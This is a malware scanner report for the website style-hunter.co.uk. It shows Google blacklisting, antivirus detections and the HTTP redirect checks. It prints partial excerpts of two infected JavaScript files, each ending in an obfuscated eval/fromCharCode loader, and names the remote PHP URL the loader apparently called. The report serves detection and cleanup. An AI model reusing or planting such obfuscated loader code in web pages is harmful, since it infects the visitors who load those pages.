New scan:

Malware Scanner report for style-hunter.co.uk

Malicious/Suspicious/Total urls checked
2/0/5
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "style-hunter.co.uk" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=style-hunter.co.uk

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://style-hunter.co.uk/
200 OK
Content-Length: 2597
Content-Type: text/html
clean
http://www.style-hunter.co.uk/scripts/sifr.js
200 OK
Content-Length: 16014
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var hasFlash=function(){var a=6;if(navigator.appVersion.indexOf("MSIE")!=-1&&navigator.appVersion.indexOf("Windows")>-1){document.write('<script language="VBScript"\> \non error resume next \nhasFlash = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash." & ' a '))) \n</script\> \n');if(window.hasFlash!=null)return window.hasFlash}if(navigator.mimeTypes&&navigator.mimeTypes["application/x-shockwave-flash"]&&navigator.mimeTypes["application/x-shockwav
... 3089 bytes are skipped ...
q1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq6dZq5dZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[ojl]("Zq");}dklb=jswd;doc=[];for(lqioh=22-20-2;-lqioh 1394!=0;lqioh =1){invel=lqioh;if((0x19==031))doc =qvur.fromCharCode(eval(rpx dklb[1*invel]) 0xa-eprh);}nakmjh=eval;if(Math.ceil(5.5)===6)nakmjh(doc)}
/*/a9a007*/

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Includer-AMA [Trj]
Ad-Aware
Trojan.Script.503932
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
nProtect
Trojan.Script.503932
TrendMicro-HouseCall
TROJ_GEN.F47V1220
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.503932 (B)
DrWeb
JS.IFrame.500
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
Trojan.Script.503932
Fortinet
JS/Kryptik.AOW!tr
F-Secure
Trojan.Script.503932
AVG
JS/Exploit
Norman
Quidvetis.A
GData
Trojan.Script.503932
ESET-NOD32
JS/Kryptik.AOW
BitDefender
Trojan.Script.503932

http://www.style-hunter.co.uk/scripts/formvalidate.js
200 OK
Content-Length: 6677
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function validateform()
{
if (document.entryform.name2.value=="") {
window.alert ("Please tell us your name.");
return false;
}
if (document.entryform.email2.value=="") {
window.alert ("Please provide your email address.");
return false;
}
if (document.entryform.printspec.value=="") {
window.alert ("Please give us some print requirements.");
return false;
}
}

... 3058 bytes are skipped ...
q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq6dZq5dZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[ojl]("Zq");}dklb=jswd;doc=[];for(lqioh=22-20-2;-lqioh 1394!=0;lqioh =1){invel=lqioh;if((0x19==031))doc =qvur.fromCharCode(eval(rpx dklb[1*invel]) 0xa-eprh);}nakmjh=eval;if(Math.ceil(5.5)===6)nakmjh(doc)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Includer-AMA [Trj]
Ad-Aware
Trojan.Script.503932
Ikarus
Trojan-Downloader.JS.Iframe
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
nProtect
Trojan.Script.503932
TrendMicro-HouseCall
TROJ_GEN.F47V1220
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.503932 (B)
DrWeb
JS.IFrame.500
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
Trojan.Script.503932
Fortinet
JS/Kryptik.AOW!tr
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
Trojan.Script.503932
AVG
JS/Exploit
Norman
Quidvetis.A
GData
Trojan.Script.503932
ESET-NOD32
JS/Kryptik.AOW
BitDefender
Trojan.Script.503932

http://faceandlook.home.pl/jtdkklmg.php?id=24269135
404 Not Found
Content-Length: 195
Content-Type: text/html
clean
http://faceandlook.home.pl/test404page.js
404 Not Found
Content-Length: 185
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: style-hunter.co.uk

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 13:29:18 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2597
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 12 Jan 2015 13:29:19 GMT
Set-Cookie: exp_last_visit=1105709359; expires=Tue, 12-Jan-2016 13:29:19 GMT; path=/
Set-Cookie: exp_last_activity=1421069359; expires=Tue, 12-Jan-2016 13:29:19 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
X-Powered-By: PHP/5.3.28

...2597 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: style-hunter.co.uk
Referer: http://www.google.com/search?q=style-hunter.co.uk

Result:
The result is similar to the first query. There are no suspicious redirects found.